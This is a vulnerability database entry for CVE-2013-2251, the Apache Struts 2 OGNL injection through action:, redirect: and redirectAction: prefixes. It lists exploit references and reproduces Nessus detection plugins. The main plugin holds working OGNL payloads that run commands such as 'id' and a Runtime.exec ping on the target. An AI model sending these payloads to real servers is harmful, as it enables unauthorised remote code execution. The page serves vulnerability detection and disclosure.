Vulnerabilities > CVE-2013-2251 - Injection vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Server Side Include (SSI) Injection An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
- Cross Site Scripting through Log Files An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Subverting Environment Variable Values The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
D2sec
| name | 2.3.15.1 RCE Linux |
| url | http://www.d2sec.com/exploits/apache-struts_defaultactionmapper__2.3.15.1_rce_linux.html |
Exploit-Db
description Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection. CVE-2013-2251. Webapps exploit for Multiple platform id EDB-ID:44583 last seen 2018-05-24 modified 2014-01-14 published 2014-01-14 reporter Exploit-DB source https://www.exploit-db.com/download/44583/ title Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection description Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution. CVE-2013-2251. Remote exploits for multiple platform id EDB-ID:27135 last seen 2016-02-03 modified 2013-07-27 published 2013-07-27 reporter metasploit source https://www.exploit-db.com/download/27135/ title Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
Metasploit
| description | The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. |
| id | MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEFAULT_ACTION_MAPPER |
| last seen | 2020-06-05 |
| modified | 2019-08-02 |
| published | 2013-07-24 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts_default_action_mapper.rb |
| title | Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution |
Nessus
NASL family CGI abuses NASL id STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL description The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression prefixed by the last seen 2020-06-01 modified 2020-06-02 plugin id 68981 published 2013-07-19 reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/68981 title Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(68981); script_version("1.31"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_cve_id("CVE-2013-2251"); script_bugtraq_id(61189); script_name(english:"Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution"); script_summary(english:"Attempts to execute arbitrary commands."); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a web application that uses a Java framework, which is affected by a remote command execution vulnerability."); script_set_attribute(attribute:"description", value: "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression prefixed by the 'action:' parameter, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server. An attacker can exploit the issue by sending a specially crafted HTTP request to the remote web server. Note that the 'redirect:' and 'redirectAction' parameters are also reportedly affected by the command execution vulnerability. Additionally, this version of Struts 2 is also reportedly affected by an open redirect vulnerability; however, Nessus has not tested for this additional issue. Note also that this plugin will only report the first vulnerable instance of a Struts 2 application. Finally, note that Apache Archiva versions prior to and equal to 1.3.6 are also affected by this issue as the application utilizes a vulnerable version of Struts 2."); script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/527977/30/0/threaded"); script_set_attribute(attribute:"see_also", value:"http://cxsecurity.com/issue/WLB-2014010087"); script_set_attribute(attribute:"see_also", value:"http://struts.apache.org/docs/s2-016.html"); script_set_attribute(attribute:"solution", value: "Upgrade to version 2.3.15.1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-2251"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/16"); script_set_attribute(attribute:"patch_publication_date", value:"2013/07/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/19"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl", "webmirror.nasl", "os_fingerprint.nasl"); script_require_ports("Services/www", 80, 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("http.inc"); include("misc_func.inc"); include("torture_cgi.inc"); include("url_func.inc"); port = get_http_port(default:8080); cgis = get_kb_list('www/' + port + '/cgi'); urls = make_list(); # To identify actions that we can test the exploit on we will look # for files with the .action / .jsp / .do suffix from the KB. if (!isnull(cgis)) { foreach cgi (cgis) { match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi); if (match) { urls = make_list(urls, match[0]); if (!thorough_tests) break; } match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi); if (!isnull(match2)) { urls = make_list(urls, match2[0]); if (!thorough_tests) break; } match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi); if (!isnull(match3)) { urls = make_list(urls, match3[0]); if (!thorough_tests) break; } if (cgi =~ "struts2?(-rest)?-showcase") { urls = make_list(urls, cgi); if (!thorough_tests) break; } } } if (thorough_tests) { cgi2 = get_kb_list('www/' + port + '/content/extensions/act*'); if (!isnull(cgi2)) urls = make_list(urls, cgi2); cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp'); if (!isnull(cgi3)) urls = make_list(urls, cgi3); cgi4 = get_kb_list('www/' + port + '/content/extensions/do'); if (!isnull(cgi4)) urls = make_list(urls, cgi4); } # Always check web root urls = make_list(urls, "/"); # Struts is slow timeout = get_read_timeout() * 2; if(timeout < 10) timeout = 10; http_set_read_timeout(timeout); urls = list_uniq(urls); # Determine which command to execute on target host os = get_kb_item("Host/OS"); if (os && report_paranoia < 2) { if ("Windows" >< os) cmd = 'ipconfig'; else cmd = 'id'; cmds = make_list(cmd); } else cmds = make_list('id', 'ipconfig'); vuln = FALSE; foreach url (urls) { foreach cmd (cmds) { vuln_url = url + "?action:%25{(new+java.lang.ProcessBuilder(new" + "+java.lang.String[]{'" +cmd+ "'})).start()}"; res = http_send_recv3( method : "GET", port : port, item : vuln_url, fetch404 : TRUE, exit_on_fail : TRUE ); if ( res[0] =~ "404 Not Found" && res[2] =~ "\<b\>message\</b\> \<u\>(.*)/java\.lang\." + "(UNIX)?Process(Impl)?@(.+)\.jsp\</u\>" ) { vuln = TRUE; break; } } # Stop after first vulnerable Struts app is found if (vuln) break; } # Alternate attack that does not rely on 404 Error Page from Tomcat/JBoss # This attack uses the redirect: Parameter if (!vuln) { time = unixtime(); foreach url (urls) { vuln_url = url +"?redirect:${%23req%3d%23context.get('com.opensymphony" + ".xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.get" + "Session().getServletContext().getRealPath('/'),%23resp%3d%23context." + "get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')." + "getWriter(),%23resp.print('At%20" +time+ "%20Nessus%20found%20the" + "%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush()," + "%23resp.close()}"; res = http_send_recv3( method : "GET", port : port, item : vuln_url, exit_on_fail : TRUE ); if ( (res[0] =~ "200 OK") && (res[2] =~ '^At '+time+' Nessus found the path is ([a-zA-Z]:\\\\|/)(.*)') ) { vuln = TRUE; break; } if (vuln) break; } } # try pingback. if(!vuln) { scanner_ip = compat::this_host(); target_ip = get_host_ip(); ua = get_kb_item("global_settings/http_user_agent"); if (empty_or_null(ua)) ua = 'Nessus'; pat = hexstr(rand_str(length:10)); if (!empty_or_null(os) && "windows" >< tolower(os)) { ping_cmd = "ping%20-n%203%20-l%20500%20" + scanner_ip; filter = "icmp and icmp[0] = 8 and src host " + target_ip + " and greater 500"; } else { ping_cmd = "ping%20-c%203%20-p" + pat + "%20" + scanner_ip; filter = "icmp and icmp[0] = 8 and src host " + target_ip; } payload_ping = "?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution" + "%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28" + "%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28" + "%23_memberAccess%2ctrue%29%[email protected]@toString%28" + "@java.lang.Runtime@getRuntime%28%29.exec%28%27" + ping_cmd + "%27%29.getInputStream%28%29%29%7d"; foreach url (urls) { soc = open_sock_tcp(port); if (!soc) audit(AUDIT_SOCK_FAIL, port); attack_url = url + payload_ping; req = 'GET ' + attack_url + ' HTTP/1.1\n' + 'Host: ' + target_ip + ':' + port + '\n' + 'User-Agent: ' + ua + '\n' + '\n'; s = send_capture(socket:soc,data:req,pcap_filter:filter); icmp = tolower(hexstr(get_icmp_element(icmp:s,element:"data"))); close(soc); if ("windows" >< tolower(os) && !isnull(icmp)) { vuln = TRUE; vuln_url = req; break; } else if (pat >< icmp) { vuln = TRUE; vuln_url = req; break; } } } # and finally, we try a simple injection of an ognl add. if(!vuln) { foreach url (urls) { payload_ognl_add = "?redirect:%24%7B57550614%2b16044095%7D"; payload_redirect_verify_regex = "Location: .*73594709"; attack_url = url + payload_ognl_add; res = http_send_recv3( method : "GET", item : attack_url, port : port, exit_on_fail : TRUE, follow_redirect: 0 ); if (res[1] =~ payload_redirect_verify_regex) { vuln = TRUE; vuln_url = attack_url; break; } # Stop after first vulnerable Struts app is found if (vuln) break; } } if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.'); security_report_v4( port : port, severity : SECURITY_HOLE, generic : TRUE, request : make_list(build_url(qs:vuln_url, port:port)), output : chomp(res[2]) );NASL family Misc. NASL id STRUTS_2_3_15_1.NASL description The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 117362 published 2018-09-10 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/117362 title Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(117362); script_version("1.11"); script_cvs_date("Date: 2019/11/05"); script_cve_id("CVE-2013-2248", "CVE-2013-2251"); script_bugtraq_id(61189, 61196); script_name(english:"Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)"); script_summary(english:"Checks the Struts 2 version."); script_set_attribute(attribute:"synopsis", value: "A web application running on the remote host uses a Java framework that is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-016"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-017"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Struts version 2.3.15.1 or later"); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-2251"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"agent", value:"all"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/09"); script_set_attribute(attribute:"patch_publication_date", value:"2013/07/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/09/10"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin"); script_require_keys("Settings/ParanoidReport"); script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts"); exit(0); } include("vcf.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); app_info = vcf::combined_get_app_info(app:"Apache Struts"); vcf::check_granularity(app_info:app_info, sig_segments:3); constraints = [ { "min_version" : "2.0.0", "max_version" : "2.3.15", "fixed_version" : "2.3.15.1" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);NASL family CGI abuses NASL id MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL description According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts : - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. (CVE-2013-2251) - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default. (CVE-2013-4316) last seen 2020-06-01 modified 2020-06-02 plugin id 83292 published 2015-05-08 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/83292 title MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(83292); script_version("1.8"); script_cvs_date("Date: 2019/11/22"); script_cve_id("CVE-2013-2251", "CVE-2013-4316"); script_bugtraq_id(61189, 62587); script_xref(name:"EDB-ID", value:"27135"); script_name(english:"MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities"); script_summary(english:"Checks the version of MySQL Enterprise Monitor."); script_set_attribute(attribute:"synopsis", value: "A web application running on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts : - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. (CVE-2013-2251) - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default. (CVE-2013-4316)"); # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?17c46362"); # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ac29c174"); script_set_attribute(attribute:"see_also", value:"https://struts.apache.org/docs/s2-016.html"); script_set_attribute(attribute:"see_also", value:"https://struts.apache.org/docs/s2-019.html"); script_set_attribute(attribute:"solution", value: "Upgrade to MySQL Enterprise Monitor 2.3.14 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/16"); script_set_attribute(attribute:"patch_publication_date", value:"2013/09/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2015/05/08"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:mysql:enterprise_monitor"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("mysql_enterprise_monitor_web_detect.nasl"); script_require_keys("installed_sw/MySQL Enterprise Monitor"); script_require_ports("Services/www", 18080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); app = "MySQL Enterprise Monitor"; get_install_count(app_name:app, exit_if_zero:TRUE); fix = "2.3.14"; port = get_http_port(default:18080); install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE); version = install['version']; install_url = build_url(port:port, qs:"/"); if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0) { if (report_verbosity > 0) { report = '\n URL : ' + install_url + '\n Installed version : ' + version + '\n Fixed version : ' + fix + '\n'; security_hole(port:port, extra:report); } else security_hole(port); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);NASL family CGI abuses NASL id ARCHIVA_1_3_8.NASL description According to its self-reported version, the instance of Apache Archiva hosted on the remote web server is 1.2.x prior than or equal to 1.2.2 or 1.3.x prior than or equal to 1.3.6 and thus is affected by the following vulnerabilities : - An input validation error exists related to unspecified scripts and unspecified parameters that could allow cross-site scripting attacks. (CVE-2013-2187) - Input validation errors exist related to the bundled version of Apache Struts that could allow arbitrary Object-Graph Navigation Language (OGNL) expression execution via specially crafted requests. (CVE-2013-2251) last seen 2020-06-01 modified 2020-06-02 plugin id 73761 published 2014-04-29 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73761 title Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(73761); script_version("1.9"); script_cvs_date("Date: 2019/11/26"); script_cve_id("CVE-2013-2187", "CVE-2013-2251"); script_bugtraq_id(61189, 66991, 66998); script_xref(name:"EDB-ID", value:"27135"); script_name(english:"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities"); script_summary(english:"Checks Archiva version"); script_set_attribute(attribute:"synopsis", value: "The remote web server hosts an application that is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "According to its self-reported version, the instance of Apache Archiva hosted on the remote web server is 1.2.x prior than or equal to 1.2.2 or 1.3.x prior than or equal to 1.3.6 and thus is affected by the following vulnerabilities : - An input validation error exists related to unspecified scripts and unspecified parameters that could allow cross-site scripting attacks. (CVE-2013-2187) - Input validation errors exist related to the bundled version of Apache Struts that could allow arbitrary Object-Graph Navigation Language (OGNL) expression execution via specially crafted requests. (CVE-2013-2251)"); script_set_attribute(attribute:"see_also", value:"http://archiva.apache.org/security.html"); script_set_attribute(attribute:"see_also", value:"http://commons.apache.org/proper/commons-ognl/"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990); script_set_attribute(attribute:"vuln_publication_date", value:"2013/07/16"); script_set_attribute(attribute:"patch_publication_date", value:"2014/04/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/04/29"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:archiva"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("archiva_detect.nasl"); script_require_keys("www/archiva"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); port = get_http_port(default:8080, embedded:FALSE); install = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE); dir = install['dir']; install_url = build_url(port:port, qs:dir+'/index.action'); version = install['ver']; if (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, "Apache Archiva", install_url); if (version !~ "^1\.[23]($|\.)") audit(AUDIT_WEB_APP_NOT_INST, "Apache Archiva 1.2.x / 1.3.x", port); # Affected (per NVD) : # 1.2.x <= 1.2.2 # 1.3.x <= 1.3.6 # Fixed (per vendor) : # 1.3.8 # 2.0.1 if ( version =~ "^1\.2($|[^0-9.])" || version =~ "^1\.2\.[012]($|[^0-9])" || version =~ "^1\.3($|[^0-9.])" || version =~ "^1\.3\.[0-6]($|[^0-9])" ) { set_kb_item(name:'www/'+port+'/XSS', value:TRUE); if (report_verbosity > 0) { report = '\n URL : ' + install_url + '\n Installed version : ' + version + '\n Fixed version : 1.3.8 / 2.0.1' + '\n'; security_hole(port:port, extra:report); } else security_hole(port); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Apache Archiva", install_url, version);
Packetstorm
data source https://packetstormsecurity.com/files/download/122541/struts_default_action_mapper.rb.txt id PACKETSTORM:122541 last seen 2016-12-05 published 2013-07-25 reporter sinn3r source https://packetstormsecurity.com/files/122541/Apache-Struts-2-DefaultActionMapper-Prefixes-OGNL-Code-Execution.html title Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution data source https://packetstormsecurity.com/files/download/122796/struts2315ognl-inject.txt id PACKETSTORM:122796 last seen 2016-12-05 published 2013-08-13 reporter Takeshi Terada source https://packetstormsecurity.com/files/122796/Struts2-2.3.15-OGNL-Injection.html title Struts2 2.3.15 OGNL Injection
Saint
| bid | 61189 |
| description | Apache Struts DefaultActionMapper redirect Prefix Vulnerability |
| osvdb | 95405 |
| title | struts_defaultactionmapper_redirect_prefix |
| type | remote |
Seebug
| bulletinFamily | exploit |
| description | CVE-2013-2251 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物 Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令 redirect:和redirectAction:此两项前缀为Struts默认开启功能,目前Struts 2.3.15.1以下版本均存在此漏洞 目前Apache Struts2已经在2.3.15.1中修补了这一漏洞。强烈建议Apache Struts2用户检查您是否受此问题影响,并尽快升级到最新版本 0 Apache Struts 2.0.0 - Apache Struts 2.3.15 厂商状态: ========== 厂商已经发布Apache Struts 2.3.15.1以修复此安全漏洞,建议Struts用户及时升级到最新版本。 厂商安全公告:S2-016 链接:http://struts.apache.org/release/2.3.x/docs/s2-016.html 软件升级页面:http://struts.apache.org/download.cgi#struts23151 |
| id | SSV:60906 |
| last seen | 2017-11-19 |
| modified | 2013-07-17 |
| published | 2013-07-17 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-60906 |
| title | Apache Struts2 多个前缀参数远程命令执行漏洞(CVE-2013-2251) |
References
- http://struts.apache.org/release/2.3.x/docs/s2-016.html
- http://www.securitytracker.com/id/1029184
- http://osvdb.org/98445
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2
- http://seclists.org/fulldisclosure/2013/Oct/96
- http://www.securityfocus.com/bid/64758
- http://seclists.org/oss-sec/2014/q1/89
- http://cxsecurity.com/issue/WLB-2014010087
- http://archiva.apache.org/security.html
- http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
- http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
- http://www.securityfocus.com/bid/61189
- http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/90392
- http://www.securitytracker.com/id/1032916
- http://packetstormsecurity.com/files/159629/Apache-Struts-2-Remote-Code-Execution.html